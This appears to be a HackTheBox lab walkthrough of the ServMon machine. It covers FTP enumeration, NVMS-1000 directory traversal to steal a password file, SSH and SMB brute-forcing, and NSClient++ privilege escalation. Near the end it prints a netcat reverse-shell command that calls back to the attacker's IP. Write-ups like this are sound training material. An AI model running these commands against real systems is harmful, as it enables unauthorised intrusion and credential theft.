ServMon HackTheBox Walkthrough

Hello guys servmon from HackThebox is getting retired today and now am allowed to release a walkthrough on it am going to be showing you guys how i solved the box . The box has an IP Address of 10.10.10.184 and was rated as an easy box but i could crank it up to a medium because the root exploit was a little bit hard to perform but apart from that the box really wasn’t that difficult to exploit. The author of the box really did a nice job and ensured you didn’t have think hard to get the answers you needed. You start off by getting an FTP directory that has anonymous authentication enabled and from the FTP directory get some files that tells you that a user left some credential in their Desktop folder and using a web application called nvms-1000 that has local file inclusion vulnerability you leverage that vulnerability to extract the credentials from the box the perform a SSH and SMB bruteforce attack and get a shell on the box USER DONE !!!!. For root you have to perform a ssh tunneling to a port that’s running NSClient++ that is only exposed localy and exploit a privilege escalation vulnerability that the web application has and get root on the box Without much say let’s jump in

As always we are going to start off with a nmap scan this will give us a pretty good idea of the services that are running on the box

And looking at the results we have a bunch of ports open

Am going to start by enumerating FTP since anonymous login is allowed. After login into FTP we get two usernames

1. Nadine
2. Nathan

So we already have potential usernames

Looking at Nadine’s home directory we get a file called confidential.txt i downloaded it to my box

Looking at Nathan’s FTP directory we get another file called Notes to do.txt which i downloaded to my box

After downloading both files to my box i logged out of FTP and decided to take a look at the files

Confidential.txt

Nathan,
I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine

Notes to do.txt

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Confiential.txt tells us that a password file has been left in Nathan’s home directory and Notes to do.txt tell us the task that needs to be completed

Since there was nothing more to enumerate from FTP i decided to enumerate SMB. I decided to see if guest authentication was enabled on the share

But sadly got an authentication error guest authentication is not allowed

I decided to move on and enumerate HTTP which is running on port 80

On opening the webpage we get homepage of a web application called nvms-1000

I decided to check if common files like robots.txt which exists on almost every website was available but got the page was blank

The next best thing to do is to run Gobuster a Directory/file & DNS busting tool written in Go. Gobuster is a tool used to brute-force URIs including directories and files as well as DNS subdomains

While gobuster was running and i decided to check if there was an exploit that the web application had in exploit database and found it had a Directory Traversal vulnerability

I copied the exploit to my working directory using -m in searchsploit

And on taking a look at it we see that the vulnerability is in the URL

So i intercepted the request with burpsuite and decided to play with the request since we were told that there was a password.txt file that had been left in Nathan’s home directory (Desktop)

After sometime was able to extract the the contents of Passwords.txt from Nathan’s Desktop folder

Now that we have potential passwords. Why don’t we bruteforce SSH using hydra since when we did a port scan we saw that secure-shell (SSH) was listening on port 22

And after some time we got a valid credential using hyrda

I ran crackmapexec which brutforces SMBto double-check hydra results and voila we certainly had a valid credential

Now that we have a valid credential let’s login to the box via ssh

Looking at his Desktop folder we have the user flag

Now it’s time for privilege escalation. The notes to do.txt talked about NSClient++

So i decided to google if the web application had vulnerability and voila i found a couple of privilege escalation exploits

And we find privilege escalation exploits and an authenticated remote code execution exploit (which wasn’t available when i did the box the first time) I’ll be going through privilege escalation using the python script since the web application has many bugs sometimes manual exploitation works and other times it doesn’t but when i did the box initially there was no python exploit script so i did it all manually

For us to exploit the web application we need to do port forwarding of NSClient++ port since it’s only exposed in localhost and since we have SSH enabled it makes the job easier since we can perform SSH tunneling or else we could have used chisel to do port forwarding

NSClient++ listens on port 8443 which is only opened on local host so doing port forwarding allows us to have access to that port in our localbox

I did port forwarding using the command below

ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184

This opens up port 8443 in our box and exposes the service running on servMon

To confirm that port forwarding was successful i opened up the web application with Mozilla FireFox and as seen below i was able to forward the port

The next thing that we are going to need is administrator’s password for the web application and you can get it using the command below

./nscp web -- password

I saved the script to my working directory and when i executed it it gave me a help menu

The command injection using the python script is blind meaning we cannot receive an output on the screen so i will set up a tcpdump listener and see if we a callback when we ping ourselves

And seeing the output below we get a callback

The next thing we will do is get a shell as administrator using netcat shells (i tried nishang but it seems to be blocked by antivirus)

I copied a netcat listener to the box /Temp directory

And then used the python exploit to gain root on the box using the command below

python privesc.py  -t 127.0.0.1 -P 8443 -p "ew2x6SsGTxjRwXOT" -c "c:\temp\nc.exe 10.10.15.23 9001 -e cmd"

I did set up a listener on my box

and executed the script as seen below

Going back to my netcat listener we have a shell as

nt authority\system

Now it’s time to get root.txt

Going to the administrators desktop we get root.txt

That’s it for now guys till next time take care

And if you liked the walkthrough you can clap for me down below